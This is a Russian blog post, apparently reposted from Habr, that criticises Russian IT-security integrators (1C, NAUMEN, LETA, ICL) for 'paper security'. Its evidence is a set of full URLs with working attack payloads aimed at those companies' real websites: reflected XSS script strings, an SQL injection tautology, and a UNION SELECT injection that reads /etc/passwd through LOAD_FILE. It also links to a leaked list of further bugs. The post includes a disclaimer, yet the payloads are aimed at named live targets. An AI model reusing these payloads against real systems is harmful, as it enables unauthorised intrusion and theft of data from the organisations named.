- PVSM.RU - https://www.pvsm.ru -
Продолжая мысль про «бумажных специалистов» обсуждаемую на хабре: http://habrahabr.ru/post/169491/ [1] хочется отметить, что помимо специалистов по ИБ есть еще и интеграторы. И с ними ситуация не лучше.
Чем занимается фирма 1С думаю не нужно рассказывать.
1c.ru/search/search.cgi?wm=-- [2]>&wf=2221&GroupBySite=no&ul=http://www.1c.ru&q=1&cmd=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
Здесь компания 1C несколько раз приветствует вас активной XSS уязвимостью
www.1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=1%27%20or%20%271%27=%271 [3]
По этому адресу фирма 1С любезно предлагает ознакомиться с курсом валют, а заодно и со всей базой данных через SQL инъекцию.
Компания NAUMEN — ведущий российский разработчик программных решений для бизнеса и органов власти. Страх и ужас.
http://www.naumen.ru/clients?filter=s_9999 union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&show_comments=1 [4]
www.naumen.ru/tests/ [5]
LETA IT-company – один из лидеров рынка информационной безопасности в России, первый оператор типизированных ИТ-услуг. Компания работает на российском рынке информационных технологий начиная с 2003 года.
www.letagroup.ru/rus/library/?company=21%22/a%3E%3Cscript%3Ealert%281001000%29%3C/script%3E [6]
ICL-КПО ВС — ведущая российская компания, предоставляющая комплексные решения в области информационных технологий и услуги по консалтингу, проектированию, внедрению, гарантийному и сервисному обслуживанию информационных систем любого масштаба.
www.icl.ru/web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=%3Cscript%3Ealert%28%27hello%20habr%27%29%3C/script%3E&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru_RU [7]
Данная статья не призывает совершать противоправные действия, она лишь констатирует очень плохую тенденцию на рынке ИБ в России. Наверху озабочены в основном соответствием нормативам и получением сертификатов, а внизу в копилках копятся баги. Такая ситуация ни к чему хорошему не приведет. В выигрыше от такого положения дел только киберкриминал.
Недавно в твиттере возникла дискуссия на тему третьей мировой, так вот я считаю, что, если она и будет, то она будет в основном кибервойной. И мы, как страна, к ней категорически не готовы, потому что безопасность у нас в основном на бумаге.
Оригинальный текст и полный список багов. [8] Проверять все ошибки у меня нет ни времени, ни желания. Просьба поделиться инвайтом на хабр c человеком слившим все эти баги. Почта для инвайта habrleaks@mail.
Автор: 090h
Источник [9]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/informatsionnaya-bezopasnost/27237
Ссылки в тексте:
[1] http://habrahabr.ru/post/169491/: http://habrahabr.ru/post/169491/
[2] 1c.ru/search/search.cgi?wm=--: http://1c.ru/search/search.cgi?wm=--
[3] www.1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=1%27%20or%20%271%27=%271: http://www.1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=1%27%20or%20%271%27=%271
[4] http://www.naumen.ru/clients?filter=s_9999 union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&show_comments=1: http://www.naumen.ru/clients?filter=s_9999 union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&show_comments=1
[5] www.naumen.ru/tests/: http://www.naumen.ru/tests/
[6] www.letagroup.ru/rus/library/?company=21%22/a%3E%3Cscript%3Ealert%281001000%29%3C/script%3E: http://www.letagroup.ru/rus/library/?company=21%22/a%3E%3Cscript%3Ealert%281001000%29%3C/script%3E
[7] www.icl.ru/web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=%3Cscript%3Ealert%28%27hello%20habr%27%29%3C/script%3E&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru_RU: http://www.icl.ru/web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=%3Cscript%3Ealert%28%27hello%20habr%27%29%3C/script%3E&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru_RU
[8] Оригинальный текст и полный список багов.: http://pastebin.com/Y3Dkeuzv
[9] Источник: http://habrahabr.ru/post/169587/
Нажмите здесь для печати.